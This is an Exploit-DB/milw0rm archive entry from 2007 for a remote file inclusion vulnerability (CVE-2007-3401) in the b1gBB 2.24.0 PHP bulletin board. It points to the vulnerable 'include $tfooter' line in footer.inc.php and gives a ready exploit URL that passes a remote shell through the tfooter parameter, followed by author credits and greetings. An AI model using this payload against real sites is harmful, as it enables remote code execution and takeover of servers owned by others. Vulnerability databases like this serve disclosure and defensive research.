b1gbb 2.24.0 - 'footer.inc.php?tfooter' Remote File Inclusion

Author: Rf7awy
type: webapps
platform: php
port: 
date_added: 2007-06-24 
date_updated: 2016-10-05 
verified: 1 
codes: OSVDB-36291;CVE-2007-3401 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comb1gbb-2.24.0.zip

# b1gBB (b1g Bulletion Board) (footer.inc.php) Remote File Inclusion
Vulnerabilities

# D.Script :
     http://switch.dl.sourceforge.net/sourceforge/b1gbb/b1gbb-2.24.0.zip

# V.Code :
     include $tfooter

# In :
     footer.inc.php

# Exploits :
http://www.name/path/footer.inc.php?tfooter=shell?


# Discovered by:
     Rf7awy
x59@hotmail.it

thanks
Mahmood_ali

# Homepage:
     http://www.Tryag.Com/cc

# Sp.Thanx To :
     Tryag-Team

# milw0rm.com [2007-06-25]